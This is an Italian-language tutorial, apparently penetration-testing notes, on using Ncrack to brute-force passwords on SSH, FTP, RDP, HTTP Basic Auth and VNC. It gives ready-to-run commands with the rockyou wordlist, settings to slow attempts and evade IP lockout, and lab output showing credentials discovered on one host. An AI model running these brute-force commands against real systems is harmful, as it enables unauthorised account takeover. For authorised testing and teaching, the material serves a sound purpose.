tags: Ncrack bruteforce


Ncrack è un potente tool di brute-force attack progettato per essere altamente scalabile e performante.
È sviluppato dagli stessi autori di Nmap, quindi è ottimizzato per la velocità e il multithreading.

Perfetto per testare la sicurezza di grandi reti e servizi remoti.
Più veloce di Hydra e Medusa su servizi come SSH, RDP, VNC, FTP, Telnet.
Può attaccare più target contemporaneamente.

Sintassi di base di Ncrack

Il comando di base di Ncrack è:

ncrack -p <PORTA> -u <USERNAME> -P <WORDLIST> <TARGET>

🔹 -p <PORTA> → Specifica la porta del servizio (es. 22 per SSH, 3389 per RDP).
🔹 -u <USERNAME> → Il nome utente da testare.
🔹 -P <WORDLIST> → La lista di password da provare.
🔹 <TARGET> → L’IP o dominio della vittima.

Se vuoi attaccare più target contemporaneamente, basta separarli con uno spazio:

ncrack -p 22 -u root -P rockyou.txt 192.168.1.10 192.168.1.11

Attacco Brute-Force su SSH

ncrack -p 22 -u root -P /usr/share/wordlists/rockyou.txt 192.168.1.100

Prova a indovinare la password di root su SSH per l’host 192.168.1.100.
Puoi aumentare la velocità con --max-parallelism per più tentativi simultanei.

Se SSH non è sulla porta 22, cambia porta con -p <PORT>:

ncrack -p 2222 -u root -P rockyou.txt 192.168.1.100

🔹 Attacco Brute-Force su un server FTP

ncrack -p 21 -u admin -P /usr/share/wordlists/rockyou.txt 192.168.1.200

Tenta di scoprire la password dell’utente admin su un server FTP.
Perfetto per testare server mal configurati.


🔹 Attacco Brute-Force su RDP (Remote Desktop Protocol)

ncrack -p 3389 -u Administrator -P rockyou.txt 192.168.1.150

Attacca un server Windows con RDP e username Administrator.
Attenzione: Molti sistemi Windows bloccano gli IP dopo troppi tentativi falliti.
🔹 Per evitare il blocco, riduci la velocità:

ncrack -p 3389 -u Administrator -P rockyou.txt 192.168.1.150 --max-attempts 3

🔹 Attacco Brute-Force su un sito web (HTTP Login)

Se un sito web ha una pagina di login con autenticazione Basic Auth, puoi provare:

ncrack -v -T5 http://192.168.1.195/5ecure/
ncrack -p 80 -u admin -P rockyou.txt http://192.168.1.50
 
 
ncrack -u joker -P /opt/wordlists/SecList/Passwords/Common-Credentials/10k-most-common.txt http://10.10.252.34:8080 -v            
 
Starting Ncrack 0.7 ( http://ncrack.org ) at 2025-11-12 21:30 CET
 
Discovered credentials on http://10.10.252.34:8080 'joker' 'hannah'
http://10.10.252.34:8080 finished.
 

Tenta il brute-force su un login HTTP (Basic Auth).

Per attacchi su form di login più avanzati, è meglio usare Hydra o BurpSuite.


🔹 Attacco Brute-Force su VNC

ncrack -p 5900 -u admin -P rockyou.txt 192.168.1.250

Tenta di accedere a un server VNC protetto da password.


🔹 Attacco su più protocolli contemporaneamente

Ncrack può attaccare più servizi allo stesso tempo!
Esempio: Attaccare SSH, FTP e RDP su un target:

ncrack -p 22,21,3389 -u root -P rockyou.txt 192.168.1.100

🔹 SSH, FTP e RDP vengono attaccati contemporaneamente per massima efficienza.


4️⃣ Opzioni avanzate

A. Impostare il numero massimo di tentativi

ncrack --max-attempts 3 -p 22 -u root -P rockyou.txt 192.168.1.100

🔹 Evita il blocco IP riducendo il numero di tentativi per password.


B. Limitare il numero di connessioni simultanee

ncrack --max-parallelism 4 -p 22 -u root -P rockyou.txt 192.168.1.100

🔹 Riduce il numero di connessioni parallele per evitare il blocco dell’IP.


C. Usare una lista di username e password

Se hai una lista di username e una di password, usa:

ncrack -p 22 -U userlist.txt -P passlist.txt 192.168.1.100

🔹 Prova combinazioni di username e password.